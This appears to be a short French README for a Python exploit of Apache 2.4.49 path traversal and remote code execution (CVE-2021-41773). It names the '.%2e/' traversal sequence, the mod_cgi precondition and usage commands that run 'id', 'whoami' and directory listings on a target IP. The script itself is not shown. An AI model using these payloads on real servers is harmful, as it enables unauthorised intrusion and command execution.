
Exploit Python pour Apache 2.4.49, traversée de chemin et exécution de code à distance (CVE-2021-41773), qui envoie des requêtes spécialement conçues pour exécuter des commandes arbitraires sur les serveurs vulnérables.
Cette vulnérabilité affecte les versions Apache HTTP Server 2.4.49. Une erreur dans la validation du chemin permet à des attaquants distants d'effectuer un Path Traversal en utilisant des séquences comme .%2e/ pour accéder à des chemins en dehors du répertoire racine configuré.
Lorsque le module mod_cgi est activé, un attaquant peut exécuter des commandes arbitraires en envoyant des requêtes spécialement conçues à un fichier CGI. Cela permet l'exécution de code à distance (RCE).
mod_cgi activéCe script permet d'exploiter la vulnérabilité en envoyant des commandes distantes au serveur affecté.
curl installépython3 exploit.py -i <IP_DEL_SERVIDOR> -c <COMANDO>
python3 exploit.py -i 172.17.0.2 -c "id"
python3 exploit.py -i 172.17.0.2 -c "whoami"
python3 exploit.py -i 172.17.0.2 -c "cd ../../../ && ls -la"